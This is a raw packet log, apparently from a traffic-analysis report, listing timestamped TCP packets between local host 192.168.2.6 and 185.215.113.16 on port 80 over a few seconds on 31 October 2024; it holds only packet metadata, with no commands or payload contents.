                                                                            Oct 31, 2024 20:49:41.195622921 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.195730925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.195821047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.195859909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.196182013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.196329117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.196345091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.196383953 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.196600914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.198636055 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.282268047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.282289982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.282347918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.282377958 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.282579899 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.282596111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.282613993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.282618999 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.282651901 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.283076048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.283274889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.283292055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.283308983 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.314825058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.314907074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.314920902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.314924002 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.314970016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.315192938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.315213919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.315231085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.315244913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.315773010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.315790892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.315810919 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.365144014 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.401124954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401173115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401197910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401242971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.401427984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401443005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401585102 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.401833057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401849031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401865959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.401870012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.401899099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.434106112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.434236050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.434252024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.434278011 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.434436083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.434474945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.434652090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.434667110 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.434683084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.434706926 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.474455118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.638478041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.638540030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.638605118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.638791084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.638808012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.638840914 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.639182091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.639197111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.639214039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.639228106 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.639740944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.639796972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.639986038 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640001059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640017033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640032053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640036106 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.640073061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.640876055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640892029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640907049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640923977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.640933037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.640969038 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.641443014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.641455889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.641509056 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.823367119 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.823399067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.823417902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.823574066 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.823682070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.823698997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.823714972 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.823734999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.823739052 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.823759079 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.824285030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.824464083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.824479103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.824493885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.824529886 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.824773073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.824788094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.824851036 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.840969086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.841027021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.841224909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.877230883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.877259016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.877305984 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.910885096 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.910990953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.911005974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.911053896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.948911905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.948983908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.949074984 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.990098953 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.004039049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.004057884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.004236937 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.004374981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.029798031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.029905081 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.030009985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.030026913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.030114889 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.030368090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.083937883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.114573956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.114609957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.114629984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.114675999 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.148979902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.148994923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.149104118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.149389982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.149400949 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.149411917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.149501085 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.233114004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.233236074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.233246088 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.233290911 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.267375946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.267417908 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.267451048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.267462969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.267544031 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.267854929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.268207073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.268258095 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.268591881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.318435907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.503276110 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.503377914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.503390074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.503499985 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.503674984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.503688097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.503700018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.503720999 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.503843069 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.504142046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.504153967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.504198074 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.504414082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.552588940 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.643208981 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:42.648051977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.932173967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.932612896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:42.933149099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.083368063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.083456039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.083467960 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.083661079 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.083766937 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.083779097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.083790064 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.083849907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.084196091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.084207058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.084270000 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.169766903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.169869900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.169879913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.169936895 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.202193975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.202264071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.202267885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.255718946 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.762649059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.762674093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.762789965 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.763439894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.763458014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.763508081 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.763859034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.763874054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.763887882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.763911963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.764542103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.764578104 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.767978907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.767993927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.768007994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.768038988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.768047094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.768078089 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.768109083 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.769704103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.769727945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.769742966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.769758940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.769777060 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.769845963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.770720005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.770736933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.770752907 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.770767927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.770781994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.770802021 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.770802021 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.771281958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.771297932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.771323919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.771338940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.771353960 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.771400928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.795453072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.795531988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.795547962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.795559883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.795593977 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.795749903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.795939922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.795953989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.795970917 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.845865011 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.845906019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.846000910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.896361113 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.914228916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.914334059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.914350986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.914393902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.914560080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.914575100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.914613962 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:43.914988995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:43.915090084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.032751083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.032819986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.032833099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.032891035 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.033063889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.033077002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.033256054 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.033380032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.033391953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.033401966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.033412933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.033417940 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.033523083 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.083837986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.151437998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.151530027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.151541948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.151572943 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.151726007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.151736975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.151762009 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.193418980 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.303818941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.303852081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.303864002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.303946018 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.304141998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.304153919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.304163933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.304176092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.304177046 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.304305077 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.304837942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.304883957 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.304986954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.305023909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.305035114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.305279016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.349592924 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.389167070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.389273882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.389317989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.389965057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.390047073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.390105963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.390242100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.390268087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.390516996 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.422991991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.423031092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.423157930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.508914948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.508954048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.508966923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.509012938 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.540676117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.540726900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.540812969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.540816069 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.540873051 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.540956974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.540968895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.541030884 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.628051996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.628087044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.628099918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.628122091 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.660239935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.660273075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.660398006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.708936930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.810520887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.810583115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.810595989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.810614109 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.810874939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.810885906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.810909986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:44.811168909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.811181068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:44.811192036 CET8049749185.215.113.16192.168.2.6
